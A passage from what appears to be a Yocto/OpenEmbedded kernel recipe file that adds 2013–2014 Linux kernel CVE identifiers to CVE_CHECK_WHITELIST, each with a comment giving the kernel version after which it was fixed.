266CVE_CHECK_WHITELIST += "CVE-2013-0160"
267
268# fixed-version: Fixed after version 3.8rc5
269CVE_CHECK_WHITELIST += "CVE-2013-0190"
270
271# fixed-version: Fixed after version 3.8rc7
272CVE_CHECK_WHITELIST += "CVE-2013-0216"
273
274# fixed-version: Fixed after version 3.8rc7
275CVE_CHECK_WHITELIST += "CVE-2013-0217"
276
277# fixed-version: Fixed after version 3.8
278CVE_CHECK_WHITELIST += "CVE-2013-0228"
279
280# fixed-version: Fixed after version 3.8rc7
281CVE_CHECK_WHITELIST += "CVE-2013-0231"
282
283# fixed-version: Fixed after version 3.8rc6
284CVE_CHECK_WHITELIST += "CVE-2013-0268"
285
286# fixed-version: Fixed after version 3.8
287CVE_CHECK_WHITELIST += "CVE-2013-0290"
288
289# fixed-version: Fixed after version 3.7rc1
290CVE_CHECK_WHITELIST += "CVE-2013-0309"
291
292# fixed-version: Fixed after version 3.5
293CVE_CHECK_WHITELIST += "CVE-2013-0310"
294
295# fixed-version: Fixed after version 3.7rc8
296CVE_CHECK_WHITELIST += "CVE-2013-0311"
297
298# fixed-version: Fixed after version 3.8rc5
299CVE_CHECK_WHITELIST += "CVE-2013-0313"
300
301# fixed-version: Fixed after version 3.11rc7
302CVE_CHECK_WHITELIST += "CVE-2013-0343"
303
304# fixed-version: Fixed after version 3.8rc6
305CVE_CHECK_WHITELIST += "CVE-2013-0349"
306
307# fixed-version: Fixed after version 3.8rc5
308CVE_CHECK_WHITELIST += "CVE-2013-0871"
309
310# fixed-version: Fixed after version 3.9rc4
311CVE_CHECK_WHITELIST += "CVE-2013-0913"
312
313# fixed-version: Fixed after version 3.9rc3
314CVE_CHECK_WHITELIST += "CVE-2013-0914"
315
316# fixed-version: Fixed after version 3.11rc1
317CVE_CHECK_WHITELIST += "CVE-2013-1059"
318
319# fixed-version: Fixed after version 3.9rc1
320CVE_CHECK_WHITELIST += "CVE-2013-1763"
321
322# fixed-version: Fixed after version 3.9rc1
323CVE_CHECK_WHITELIST += "CVE-2013-1767"
324
325# fixed-version: Fixed after version 3.5rc1
326CVE_CHECK_WHITELIST += "CVE-2013-1772"
327
328# fixed-version: Fixed after version 3.3rc1
329CVE_CHECK_WHITELIST += "CVE-2013-1773"
330
331# fixed-version: Fixed after version 3.8rc5
332CVE_CHECK_WHITELIST += "CVE-2013-1774"
333
334# fixed-version: Fixed after version 3.9rc3
335CVE_CHECK_WHITELIST += "CVE-2013-1792"
336
337# fixed-version: Fixed after version 3.9rc4
338CVE_CHECK_WHITELIST += "CVE-2013-1796"
339
340# fixed-version: Fixed after version 3.9rc4
341CVE_CHECK_WHITELIST += "CVE-2013-1797"
342
343# fixed-version: Fixed after version 3.9rc4
344CVE_CHECK_WHITELIST += "CVE-2013-1798"
345
346# fixed-version: Fixed after version 3.8rc6
347CVE_CHECK_WHITELIST += "CVE-2013-1819"
348
349# fixed-version: Fixed after version 3.6rc7
350CVE_CHECK_WHITELIST += "CVE-2013-1826"
351
352# fixed-version: Fixed after version 3.6rc3
353CVE_CHECK_WHITELIST += "CVE-2013-1827"
354
355# fixed-version: Fixed after version 3.9rc2
356CVE_CHECK_WHITELIST += "CVE-2013-1828"
357
358# fixed-version: Fixed after version 3.9rc3
359CVE_CHECK_WHITELIST += "CVE-2013-1848"
360
361# fixed-version: Fixed after version 3.9rc3
362CVE_CHECK_WHITELIST += "CVE-2013-1858"
363
364# fixed-version: Fixed after version 3.9rc3
365CVE_CHECK_WHITELIST += "CVE-2013-1860"
366
367# fixed-version: Fixed after version 3.7rc3
368CVE_CHECK_WHITELIST += "CVE-2013-1928"
369
370# fixed-version: Fixed after version 3.9rc6
371CVE_CHECK_WHITELIST += "CVE-2013-1929"
372
373# Skipping CVE-2013-1935, no affected_versions
374
375# fixed-version: Fixed after version 3.0rc1
376CVE_CHECK_WHITELIST += "CVE-2013-1943"
377
378# fixed-version: Fixed after version 3.9rc5
379CVE_CHECK_WHITELIST += "CVE-2013-1956"
380
381# fixed-version: Fixed after version 3.9rc5
382CVE_CHECK_WHITELIST += "CVE-2013-1957"
383
384# fixed-version: Fixed after version 3.9rc5
385CVE_CHECK_WHITELIST += "CVE-2013-1958"
386
387# fixed-version: Fixed after version 3.9rc7
388CVE_CHECK_WHITELIST += "CVE-2013-1959"
389
390# fixed-version: Fixed after version 3.9rc8
391CVE_CHECK_WHITELIST += "CVE-2013-1979"
392
393# fixed-version: Fixed after version 3.8rc2
394CVE_CHECK_WHITELIST += "CVE-2013-2015"
395
396# fixed-version: Fixed after version 2.6.34
397CVE_CHECK_WHITELIST += "CVE-2013-2017"
398
399# fixed-version: Fixed after version 3.8rc4
400CVE_CHECK_WHITELIST += "CVE-2013-2058"
401
402# fixed-version: Fixed after version 3.9rc8
403CVE_CHECK_WHITELIST += "CVE-2013-2094"
404
405# fixed-version: Fixed after version 2.6.34rc4
406CVE_CHECK_WHITELIST += "CVE-2013-2128"
407
408# fixed-version: Fixed after version 3.11rc3
409CVE_CHECK_WHITELIST += "CVE-2013-2140"
410
411# fixed-version: Fixed after version 3.9rc8
412CVE_CHECK_WHITELIST += "CVE-2013-2141"
413
414# fixed-version: Fixed after version 3.9rc8
415CVE_CHECK_WHITELIST += "CVE-2013-2146"
416
417# fixed-version: Fixed after version 3.12rc3
418CVE_CHECK_WHITELIST += "CVE-2013-2147"
419
420# fixed-version: Fixed after version 3.11rc1
421CVE_CHECK_WHITELIST += "CVE-2013-2148"
422
423# fixed-version: Fixed after version 3.11rc1
424CVE_CHECK_WHITELIST += "CVE-2013-2164"
425
426# Skipping CVE-2013-2188, no affected_versions
427
428# fixed-version: Fixed after version 3.9rc4
429CVE_CHECK_WHITELIST += "CVE-2013-2206"
430
431# Skipping CVE-2013-2224, no affected_versions
432
433# fixed-version: Fixed after version 3.10
434CVE_CHECK_WHITELIST += "CVE-2013-2232"
435
436# fixed-version: Fixed after version 3.10
437CVE_CHECK_WHITELIST += "CVE-2013-2234"
438
439# fixed-version: Fixed after version 3.9rc6
440CVE_CHECK_WHITELIST += "CVE-2013-2237"
441
442# Skipping CVE-2013-2239, no affected_versions
443
444# fixed-version: Fixed after version 3.9rc1
445CVE_CHECK_WHITELIST += "CVE-2013-2546"
446
447# fixed-version: Fixed after version 3.9rc1
448CVE_CHECK_WHITELIST += "CVE-2013-2547"
449
450# fixed-version: Fixed after version 3.9rc1
451CVE_CHECK_WHITELIST += "CVE-2013-2548"
452
453# fixed-version: Fixed after version 3.9rc8
454CVE_CHECK_WHITELIST += "CVE-2013-2596"
455
456# fixed-version: Fixed after version 3.9rc3
457CVE_CHECK_WHITELIST += "CVE-2013-2634"
458
459# fixed-version: Fixed after version 3.9rc3
460CVE_CHECK_WHITELIST += "CVE-2013-2635"
461
462# fixed-version: Fixed after version 3.9rc3
463CVE_CHECK_WHITELIST += "CVE-2013-2636"
464
465# fixed-version: Fixed after version 3.10rc4
466CVE_CHECK_WHITELIST += "CVE-2013-2850"
467
468# fixed-version: Fixed after version 3.11rc1
469CVE_CHECK_WHITELIST += "CVE-2013-2851"
470
471# fixed-version: Fixed after version 3.10rc6
472CVE_CHECK_WHITELIST += "CVE-2013-2852"
473
474# fixed-version: Fixed after version 3.12rc1
475CVE_CHECK_WHITELIST += "CVE-2013-2888"
476
477# fixed-version: Fixed after version 3.12rc2
478CVE_CHECK_WHITELIST += "CVE-2013-2889"
479
480# fixed-version: Fixed after version 3.12rc2
481CVE_CHECK_WHITELIST += "CVE-2013-2890"
482
483# fixed-version: Fixed after version 3.12rc2
484CVE_CHECK_WHITELIST += "CVE-2013-2891"
485
486# fixed-version: Fixed after version 3.12rc1
487CVE_CHECK_WHITELIST += "CVE-2013-2892"
488
489# fixed-version: Fixed after version 3.12rc2
490CVE_CHECK_WHITELIST += "CVE-2013-2893"
491
492# fixed-version: Fixed after version 3.12rc2
493CVE_CHECK_WHITELIST += "CVE-2013-2894"
494
495# fixed-version: Fixed after version 3.12rc2
496CVE_CHECK_WHITELIST += "CVE-2013-2895"
497
498# fixed-version: Fixed after version 3.12rc1
499CVE_CHECK_WHITELIST += "CVE-2013-2896"
500
501# fixed-version: Fixed after version 3.12rc2
502CVE_CHECK_WHITELIST += "CVE-2013-2897"
503
504# fixed-version: Fixed after version 3.12rc1
505CVE_CHECK_WHITELIST += "CVE-2013-2898"
506
507# fixed-version: Fixed after version 3.12rc1
508CVE_CHECK_WHITELIST += "CVE-2013-2899"
509
510# fixed-version: Fixed after version 3.13rc1
511CVE_CHECK_WHITELIST += "CVE-2013-2929"
512
513# fixed-version: Fixed after version 3.13rc1
514CVE_CHECK_WHITELIST += "CVE-2013-2930"
515
516# fixed-version: Fixed after version 3.9
517CVE_CHECK_WHITELIST += "CVE-2013-3076"
518
519# fixed-version: Fixed after version 3.9rc7
520CVE_CHECK_WHITELIST += "CVE-2013-3222"
521
522# fixed-version: Fixed after version 3.9rc7
523CVE_CHECK_WHITELIST += "CVE-2013-3223"
524
525# fixed-version: Fixed after version 3.9rc7
526CVE_CHECK_WHITELIST += "CVE-2013-3224"
527
528# fixed-version: Fixed after version 3.9rc7
529CVE_CHECK_WHITELIST += "CVE-2013-3225"
530
531# fixed-version: Fixed after version 3.9rc7
532CVE_CHECK_WHITELIST += "CVE-2013-3226"
533
534# fixed-version: Fixed after version 3.9rc7
535CVE_CHECK_WHITELIST += "CVE-2013-3227"
536
537# fixed-version: Fixed after version 3.9rc7
538CVE_CHECK_WHITELIST += "CVE-2013-3228"
539
540# fixed-version: Fixed after version 3.9rc7
541CVE_CHECK_WHITELIST += "CVE-2013-3229"
542
543# fixed-version: Fixed after version 3.9rc7
544CVE_CHECK_WHITELIST += "CVE-2013-3230"
545
546# fixed-version: Fixed after version 3.9rc7
547CVE_CHECK_WHITELIST += "CVE-2013-3231"
548
549# fixed-version: Fixed after version 3.9rc7
550CVE_CHECK_WHITELIST += "CVE-2013-3232"
551
552# fixed-version: Fixed after version 3.9rc7
553CVE_CHECK_WHITELIST += "CVE-2013-3233"
554
555# fixed-version: Fixed after version 3.9rc7
556CVE_CHECK_WHITELIST += "CVE-2013-3234"
557
558# fixed-version: Fixed after version 3.9rc7
559CVE_CHECK_WHITELIST += "CVE-2013-3235"
560
561# fixed-version: Fixed after version 3.9rc7
562CVE_CHECK_WHITELIST += "CVE-2013-3236"
563
564# fixed-version: Fixed after version 3.9rc7
565CVE_CHECK_WHITELIST += "CVE-2013-3237"
566
567# fixed-version: Fixed after version 3.9rc7
568CVE_CHECK_WHITELIST += "CVE-2013-3301"
569
570# fixed-version: Fixed after version 3.8rc3
571CVE_CHECK_WHITELIST += "CVE-2013-3302"
572
573# fixed-version: Fixed after version 3.11rc1
574CVE_CHECK_WHITELIST += "CVE-2013-4125"
575
576# fixed-version: Fixed after version 3.11rc1
577CVE_CHECK_WHITELIST += "CVE-2013-4127"
578
579# fixed-version: Fixed after version 3.11rc1
580CVE_CHECK_WHITELIST += "CVE-2013-4129"
581
582# fixed-version: Fixed after version 3.11rc1
583CVE_CHECK_WHITELIST += "CVE-2013-4162"
584
585# fixed-version: Fixed after version 3.11rc1
586CVE_CHECK_WHITELIST += "CVE-2013-4163"
587
588# fixed-version: Fixed after version 3.11rc5
589CVE_CHECK_WHITELIST += "CVE-2013-4205"
590
591# fixed-version: Fixed after version 3.10rc4
592CVE_CHECK_WHITELIST += "CVE-2013-4220"
593
594# fixed-version: Fixed after version 3.10rc5
595CVE_CHECK_WHITELIST += "CVE-2013-4247"
596
597# fixed-version: Fixed after version 3.11rc6
598CVE_CHECK_WHITELIST += "CVE-2013-4254"
599
600# fixed-version: Fixed after version 3.12rc4
601CVE_CHECK_WHITELIST += "CVE-2013-4270"
602
603# fixed-version: Fixed after version 3.12rc6
604CVE_CHECK_WHITELIST += "CVE-2013-4299"
605
606# fixed-version: Fixed after version 3.11
607CVE_CHECK_WHITELIST += "CVE-2013-4300"
608
609# fixed-version: Fixed after version 4.5rc1
610CVE_CHECK_WHITELIST += "CVE-2013-4312"
611
612# fixed-version: Fixed after version 3.12rc2
613CVE_CHECK_WHITELIST += "CVE-2013-4343"
614
615# fixed-version: Fixed after version 3.13rc2
616CVE_CHECK_WHITELIST += "CVE-2013-4345"
617
618# fixed-version: Fixed after version 3.13rc1
619CVE_CHECK_WHITELIST += "CVE-2013-4348"
620
621# fixed-version: Fixed after version 3.12rc2
622CVE_CHECK_WHITELIST += "CVE-2013-4350"
623
624# fixed-version: Fixed after version 3.12rc4
625CVE_CHECK_WHITELIST += "CVE-2013-4387"
626
627# fixed-version: Fixed after version 3.12rc7
628CVE_CHECK_WHITELIST += "CVE-2013-4470"
629
630# fixed-version: Fixed after version 3.10rc1
631CVE_CHECK_WHITELIST += "CVE-2013-4483"
632
633# fixed-version: Fixed after version 3.12
634CVE_CHECK_WHITELIST += "CVE-2013-4511"
635
636# fixed-version: Fixed after version 3.12
637CVE_CHECK_WHITELIST += "CVE-2013-4512"
638
639# fixed-version: Fixed after version 3.12
640CVE_CHECK_WHITELIST += "CVE-2013-4513"
641
642# fixed-version: Fixed after version 3.12
643CVE_CHECK_WHITELIST += "CVE-2013-4514"
644
645# fixed-version: Fixed after version 3.12
646CVE_CHECK_WHITELIST += "CVE-2013-4515"
647
648# fixed-version: Fixed after version 3.12
649CVE_CHECK_WHITELIST += "CVE-2013-4516"
650
651# fixed-version: Fixed after version 3.13rc1
652CVE_CHECK_WHITELIST += "CVE-2013-4563"
653
654# fixed-version: Fixed after version 3.13rc7
655CVE_CHECK_WHITELIST += "CVE-2013-4579"
656
657# fixed-version: Fixed after version 3.13rc4
658CVE_CHECK_WHITELIST += "CVE-2013-4587"
659
660# fixed-version: Fixed after version 2.6.33rc4
661CVE_CHECK_WHITELIST += "CVE-2013-4588"
662
663# fixed-version: Fixed after version 3.8rc1
664CVE_CHECK_WHITELIST += "CVE-2013-4591"
665
666# fixed-version: Fixed after version 3.7rc1
667CVE_CHECK_WHITELIST += "CVE-2013-4592"
668
669# Skipping CVE-2013-4737, no affected_versions
670
671# Skipping CVE-2013-4738, no affected_versions
672
673# Skipping CVE-2013-4739, no affected_versions
674
675# fixed-version: Fixed after version 3.10rc5
676CVE_CHECK_WHITELIST += "CVE-2013-5634"
677
678# fixed-version: Fixed after version 3.6rc6
679CVE_CHECK_WHITELIST += "CVE-2013-6282"
680
681# fixed-version: Fixed after version 3.13rc4
682CVE_CHECK_WHITELIST += "CVE-2013-6367"
683
684# fixed-version: Fixed after version 3.13rc4
685CVE_CHECK_WHITELIST += "CVE-2013-6368"
686
687# fixed-version: Fixed after version 3.13rc4
688CVE_CHECK_WHITELIST += "CVE-2013-6376"
689
690# fixed-version: Fixed after version 3.13rc1
691CVE_CHECK_WHITELIST += "CVE-2013-6378"
692
693# fixed-version: Fixed after version 3.13rc1
694CVE_CHECK_WHITELIST += "CVE-2013-6380"
695
696# fixed-version: Fixed after version 3.13rc1
697CVE_CHECK_WHITELIST += "CVE-2013-6381"
698
699# fixed-version: Fixed after version 3.13rc4
700CVE_CHECK_WHITELIST += "CVE-2013-6382"
701
702# fixed-version: Fixed after version 3.12
703CVE_CHECK_WHITELIST += "CVE-2013-6383"
704
705# Skipping CVE-2013-6392, no affected_versions
706
707# fixed-version: Fixed after version 3.12rc1
708CVE_CHECK_WHITELIST += "CVE-2013-6431"
709
710# fixed-version: Fixed after version 3.13rc1
711CVE_CHECK_WHITELIST += "CVE-2013-6432"
712
713# fixed-version: Fixed after version 3.14rc1
714CVE_CHECK_WHITELIST += "CVE-2013-6885"
715
716# fixed-version: Fixed after version 3.13rc1
717CVE_CHECK_WHITELIST += "CVE-2013-7026"
718
719# fixed-version: Fixed after version 3.12rc7
720CVE_CHECK_WHITELIST += "CVE-2013-7027"
721
722# fixed-version: Fixed after version 3.13rc1
723CVE_CHECK_WHITELIST += "CVE-2013-7263"
724
725# fixed-version: Fixed after version 3.13rc1
726CVE_CHECK_WHITELIST += "CVE-2013-7264"
727
728# fixed-version: Fixed after version 3.13rc1
729CVE_CHECK_WHITELIST += "CVE-2013-7265"
730
731# fixed-version: Fixed after version 3.13rc1
732CVE_CHECK_WHITELIST += "CVE-2013-7266"
733
734# fixed-version: Fixed after version 3.13rc1
735CVE_CHECK_WHITELIST += "CVE-2013-7267"
736
737# fixed-version: Fixed after version 3.13rc1
738CVE_CHECK_WHITELIST += "CVE-2013-7268"
739
740# fixed-version: Fixed after version 3.13rc1
741CVE_CHECK_WHITELIST += "CVE-2013-7269"
742
743# fixed-version: Fixed after version 3.13rc1
744CVE_CHECK_WHITELIST += "CVE-2013-7270"
745
746# fixed-version: Fixed after version 3.13rc1
747CVE_CHECK_WHITELIST += "CVE-2013-7271"
748
749# fixed-version: Fixed after version 3.13rc1
750CVE_CHECK_WHITELIST += "CVE-2013-7281"
751
752# fixed-version: Fixed after version 3.13rc7
753CVE_CHECK_WHITELIST += "CVE-2013-7339"
754
755# fixed-version: Fixed after version 3.13rc1
756CVE_CHECK_WHITELIST += "CVE-2013-7348"
757
758# fixed-version: Fixed after version 3.19rc1
759CVE_CHECK_WHITELIST += "CVE-2013-7421"
760
761# CVE-2013-7445 has no known resolution
762
763# fixed-version: Fixed after version 4.4rc4
764CVE_CHECK_WHITELIST += "CVE-2013-7446"
765
766# fixed-version: Fixed after version 3.12rc7
767CVE_CHECK_WHITELIST += "CVE-2013-7470"
768
769# fixed-version: Fixed after version 3.14rc1
770CVE_CHECK_WHITELIST += "CVE-2014-0038"
771
772# fixed-version: Fixed after version 3.14rc5
773CVE_CHECK_WHITELIST += "CVE-2014-0049"
774
775# fixed-version: Fixed after version 3.14
776CVE_CHECK_WHITELIST += "CVE-2014-0055"
777
778# fixed-version: Fixed after version 3.14rc4
779CVE_CHECK_WHITELIST += "CVE-2014-0069"
780
781# fixed-version: Fixed after version 3.14
782CVE_CHECK_WHITELIST += "CVE-2014-0077"
783
784# fixed-version: Fixed after version 3.14rc7
785CVE_CHECK_WHITELIST += "CVE-2014-0100"
786
787# fixed-version: Fixed after version 3.14rc6
788CVE_CHECK_WHITELIST += "CVE-2014-0101"
789
790# fixed-version: Fixed after version 3.14rc6
791CVE_CHECK_WHITELIST += "CVE-2014-0102"
792
793# fixed-version: Fixed after version 3.14rc7
794CVE_CHECK_WHITELIST += "CVE-2014-0131"
795
796# fixed-version: Fixed after version 3.15rc2
797CVE_CHECK_WHITELIST += "CVE-2014-0155"
798
799# fixed-version: Fixed after version 3.15rc5
800CVE_CHECK_WHITELIST += "CVE-2014-0181"
801
802# fixed-version: Fixed after version 3.15rc5
803CVE_CHECK_WHITELIST += "CVE-2014-0196"
804
805# fixed-version: Fixed after version 2.6.33rc5
806CVE_CHECK_WHITELIST += "CVE-2014-0203"
807
808# fixed-version: Fixed after version 2.6.37rc1
809CVE_CHECK_WHITELIST += "CVE-2014-0205"
810
811# fixed-version: Fixed after version 3.16rc3
812CVE_CHECK_WHITELIST += "CVE-2014-0206"
813
814# Skipping CVE-2014-0972, no affected_versions
815
816# fixed-version: Fixed after version 3.13
817CVE_CHECK_WHITELIST += "CVE-2014-1438"
818
819# fixed-version: Fixed after version 3.12rc7
820CVE_CHECK_WHITELIST += "CVE-2014-1444"
821
822# fixed-version: Fixed after version 3.12rc7
823CVE_CHECK_WHITELIST += "CVE-2014-1445"
824
825# fixed-version: Fixed after version 3.13rc7
826CVE_CHECK_WHITELIST += "CVE-2014-1446"
827
828# fixed-version: Fixed after version 3.13rc8
829CVE_CHECK_WHITELIST += "CVE-2014-1690"
830
831# fixed-version: Fixed after version 3.15rc5
832CVE_CHECK_WHITELIST += "CVE-2014-1737"
833
834# fixed-version: Fixed after version 3.15rc5
835CVE_CHECK_WHITELIST += "CVE-2014-1738"
836
837# fixed-version: Fixed after version 3.15rc6
838CVE_CHECK_WHITELIST += "CVE-2014-1739"
839
840# fixed-version: Fixed after version 3.14rc2
841CVE_CHECK_WHITELIST += "CVE-2014-1874"
842
843# fixed-version: Fixed after version 3.14rc1
844CVE_CHECK_WHITELIST += "CVE-2014-2038"
845
846# fixed-version: Fixed after version 3.14rc3
847CVE_CHECK_WHITELIST += "CVE-2014-2039"
848
849# fixed-version: Fixed after version 3.14rc7
850CVE_CHECK_WHITELIST += "CVE-2014-2309"
851
852# fixed-version: Fixed after version 3.14rc1
853CVE_CHECK_WHITELIST += "CVE-2014-2523"
854
855# fixed-version: Fixed after version 3.14
856CVE_CHECK_WHITELIST += "CVE-2014-2568"
857
858# fixed-version: Fixed after version 3.15rc1
859CVE_CHECK_WHITELIST += "CVE-2014-2580"
860
861# fixed-version: Fixed after version 3.14rc6
862CVE_CHECK_WHITELIST += "CVE-2014-2672"
863
864# fixed-version: Fixed after version 3.14rc6
865CVE_CHECK_WHITELIST += "CVE-2014-2673"
866
867# fixed-version: Fixed after version 3.15rc1
868CVE_CHECK_WHITELIST += "CVE-2014-2678"
869
870# fixed-version: Fixed after version 3.14rc6
871CVE_CHECK_WHITELIST += "CVE-2014-2706"
872
873# fixed-version: Fixed after version 3.15rc1
874CVE_CHECK_WHITELIST += "CVE-2014-2739"
875
876# fixed-version: Fixed after version 3.15rc2
877CVE_CHECK_WHITELIST += "CVE-2014-2851"
878
879# fixed-version: Fixed after version 3.2rc7
880CVE_CHECK_WHITELIST += "CVE-2014-2889"
881
882# fixed-version: Fixed after version 3.15rc1
883CVE_CHECK_WHITELIST += "CVE-2014-3122"
884
885# fixed-version: Fixed after version 3.15rc2
886CVE_CHECK_WHITELIST += "CVE-2014-3144"
887
888# fixed-version: Fixed after version 3.15rc2
889CVE_CHECK_WHITELIST += "CVE-2014-3145"
890
891# fixed-version: Fixed after version 3.15
892CVE_CHECK_WHITELIST += "CVE-2014-3153"
893
894# fixed-version: Fixed after version 3.17rc4
895CVE_CHECK_WHITELIST += "CVE-2014-3180"
896
897# fixed-version: Fixed after version 3.17rc3
898CVE_CHECK_WHITELIST += "CVE-2014-3181"
899
900# fixed-version: Fixed after version 3.17rc2
901CVE_CHECK_WHITELIST += "CVE-2014-3182"
902
903# fixed-version: Fixed after version 3.17rc2
904CVE_CHECK_WHITELIST += "CVE-2014-3183"
905
906# fixed-version: Fixed after version 3.17rc2
907CVE_CHECK_WHITELIST += "CVE-2014-3184"
908
909# fixed-version: Fixed after version 3.17rc3
910CVE_CHECK_WHITELIST += "CVE-2014-3185"
911
912# fixed-version: Fixed after version 3.17rc3
913CVE_CHECK_WHITELIST += "CVE-2014-3186"
914
915# Skipping CVE-2014-3519, no affected_versions
916
917# fixed-version: Fixed after version 3.16rc7
918CVE_CHECK_WHITELIST += "CVE-2014-3534"
919
920# fixed-version: Fixed after version 2.6.36rc1
921CVE_CHECK_WHITELIST += "CVE-2014-3535"
922
923# fixed-version: Fixed after version 3.17rc2
924CVE_CHECK_WHITELIST += "CVE-2014-3601"
925
926# fixed-version: Fixed after version 3.18rc2
927CVE_CHECK_WHITELIST += "CVE-2014-3610"
928
929# fixed-version: Fixed after version 3.18rc2
930CVE_CHECK_WHITELIST += "CVE-2014-3611"
931
932# fixed-version: Fixed after version 3.17rc5
933CVE_CHECK_WHITELIST += "CVE-2014-3631"
934
935# fixed-version: Fixed after version 3.12rc1
936CVE_CHECK_WHITELIST += "CVE-2014-3645"
937
938# fixed-version: Fixed after version 3.18rc2
939CVE_CHECK_WHITELIST += "CVE-2014-3646"
940
941# fixed-version: Fixed after version 3.18rc2
942CVE_CHECK_WHITELIST += "CVE-2014-3647"
943
944# fixed-version: Fixed after version 3.18rc1
945CVE_CHECK_WHITELIST += "CVE-2014-3673"
946
947# fixed-version: Fixed after version 3.18rc1
948CVE_CHECK_WHITELIST += "CVE-2014-3687"
949
950# fixed-version: Fixed after version 3.18rc1
951CVE_CHECK_WHITELIST += "CVE-2014-3688"
952
953# fixed-version: Fixed after version 3.18rc1
954CVE_CHECK_WHITELIST += "CVE-2014-3690"
955
956# fixed-version: Fixed after version 3.16rc1
957CVE_CHECK_WHITELIST += "CVE-2014-3917"
958
959# fixed-version: Fixed after version 3.15
960CVE_CHECK_WHITELIST += "CVE-2014-3940"
961
962# fixed-version: Fixed after version 3.16rc1
963CVE_CHECK_WHITELIST += "CVE-2014-4014"
964
965# fixed-version: Fixed after version 3.14rc1
966CVE_CHECK_WHITELIST += "CVE-2014-4027"
967
968# fixed-version: Fixed after version 3.15rc1
969CVE_CHECK_WHITELIST += "CVE-2014-4157"
970
971# fixed-version: Fixed after version 3.16rc3
972CVE_CHECK_WHITELIST += "CVE-2014-4171"
973
974# Skipping CVE-2014-4322, no affected_versions
975
976# Skipping CVE-2014-4323, no affected_versions
977
978# fixed-version: Fixed after version 3.16rc3
979CVE_CHECK_WHITELIST += "CVE-2014-4508"
980
981# fixed-version: Fixed after version 3.18rc1
982CVE_CHECK_WHITELIST += "CVE-2014-4608"
983
984# fixed-version: Fixed after version 3.16rc3
985CVE_CHECK_WHITELIST += "CVE-2014-4611"
986
987# fixed-version: Fixed after version 3.16rc2
988CVE_CHECK_WHITELIST += "CVE-2014-4652"
989
990# fixed-version: Fixed after version 3.16rc2
991CVE_CHECK_WHITELIST += "CVE-2014-4653"
992
993# fixed-version: Fixed after version 3.16rc2
994CVE_CHECK_WHITELIST += "CVE-2014-4654"
995
996# fixed-version: Fixed after version 3.16rc2
997CVE_CHECK_WHITELIST += "CVE-2014-4655"
998
999# fixed-version: Fixed after version 3.16rc2
1000CVE_CHECK_WHITELIST += "CVE-2014-4656"
1001
1002# fixed-version: Fixed after version 3.16rc1
1003CVE_CHECK_WHITELIST += "CVE-2014-4667"
1004
1005# fixed-version: Fixed after version 3.16rc4
1006CVE_CHECK_WHITELIST += "CVE-2014-4699"
1007
1008# fixed-version: Fixed after version 3.16rc6
1009CVE_CHECK_WHITELIST += "CVE-2014-4943"
1010
1011# fixed-version: Fixed after version 3.16rc7
1012CVE_CHECK_WHITELIST += "CVE-2014-5045"
1013
1014# fixed-version: Fixed after version 3.16
1015CVE_CHECK_WHITELIST += "CVE-2014-5077"
1016
1017# fixed-version: Fixed after version 3.17rc1
1018CVE_CHECK_WHITELIST += "CVE-2014-5206"
1019
1020# fixed-version: Fixed after version 3.17rc1
1021CVE_CHECK_WHITELIST += "CVE-2014-5207"
1022
1023# Skipping CVE-2014-5332, no affected_versions
1024
1025# fixed-version: Fixed after version 3.17rc2
1026CVE_CHECK_WHITELIST += "CVE-2014-5471"
1027
1028# fixed-version: Fixed after version 3.17rc2
1029CVE_CHECK_WHITELIST += "CVE-2014-5472"
1030
1031# fixed-version: Fixed after version 3.17rc5
1032CVE_CHECK_WHITELIST += "CVE-2014-6410"
1033
1034# fixed-version: Fixed after version 3.17rc5
1035CVE_CHECK_WHITELIST += "CVE-2014-6416"
1036
1037# fixed-version: Fixed after version 3.17rc5
1038CVE_CHECK_WHITELIST += "CVE-2014-6417"
1039
1040# fixed-version: Fixed after version 3.17rc5
1041CVE_CHECK_WHITELIST += "CVE-2014-6418"
1042
1043# fixed-version: Fixed after version 3.17rc2
1044CVE_CHECK_WHITELIST += "CVE-2014-7145"
1045
1046# Skipping CVE-2014-7207, no affected_versions
1047
1048# fixed-version: Fixed after version 3.15rc1
1049CVE_CHECK_WHITELIST += "CVE-2014-7283"
1050
1051# fixed-version: Fixed after version 3.15rc7
1052CVE_CHECK_WHITELIST += "CVE-2014-7284"
1053
1054# fixed-version: Fixed after version 3.16rc1
1055CVE_CHECK_WHITELIST += "CVE-2014-7822"
1056
1057# fixed-version: Fixed after version 3.18rc3
1058CVE_CHECK_WHITELIST += "CVE-2014-7825"
1059
1060# fixed-version: Fixed after version 3.18rc3
1061CVE_CHECK_WHITELIST += "CVE-2014-7826"
1062
1063# fixed-version: Fixed after version 3.18rc5
1064CVE_CHECK_WHITELIST += "CVE-2014-7841"
1065
1066# fixed-version: Fixed after version 3.18rc1
1067CVE_CHECK_WHITELIST += "CVE-2014-7842"
1068
1069# fixed-version: Fixed after version 3.18rc5
1070CVE_CHECK_WHITELIST += "CVE-2014-7843"
1071
1072# fixed-version: Fixed after version 3.18rc1
1073CVE_CHECK_WHITELIST += "CVE-2014-7970"
1074
1075# fixed-version: Fixed after version 3.18rc1
1076CVE_CHECK_WHITELIST += "CVE-2014-7975"
1077
1078# fixed-version: Fixed after version 3.18rc3
1079CVE_CHECK_WHITELIST += "CVE-2014-8086"
1080
1081# fixed-version: Fixed after version 3.19rc1
1082CVE_CHECK_WHITELIST += "CVE-2014-8133"
1083
1084# fixed-version: Fixed after version 3.19rc1
1085CVE_CHECK_WHITELIST += "CVE-2014-8134"
1086
1087# fixed-version: Fixed after version 4.0rc7
1088CVE_CHECK_WHITELIST += "CVE-2014-8159"
1089
1090# fixed-version: Fixed after version 3.18rc1
1091CVE_CHECK_WHITELIST += "CVE-2014-8160"
1092
1093# fixed-version: Fixed after version 3.12rc1
1094CVE_CHECK_WHITELIST += "CVE-2014-8171"
1095
1096# fixed-version: Fixed after version 3.13rc1
1097CVE_CHECK_WHITELIST += "CVE-2014-8172"
1098
1099# fixed-version: Fixed after version 3.13rc5
1100CVE_CHECK_WHITELIST += "CVE-2014-8173"
1101
1102# Skipping CVE-2014-8181, no affected_versions
1103
1104# fixed-version: Fixed after version 3.18rc2
1105CVE_CHECK_WHITELIST += "CVE-2014-8369"
1106
1107# fixed-version: Fixed after version 3.18rc2
1108CVE_CHECK_WHITELIST += "CVE-2014-8480"
1109
1110# fixed-version: Fixed after version 3.18rc2
1111CVE_CHECK_WHITELIST += "CVE-2014-8481"
1112
1113# fixed-version: Fixed after version 3.19rc1
1114CVE_CHECK_WHITELIST += "CVE-2014-8559"
1115
1116# fixed-version: Fixed after version 3.14rc3
1117CVE_CHECK_WHITELIST += "CVE-2014-8709"
1118
1119# fixed-version: Fixed after version 3.18rc1
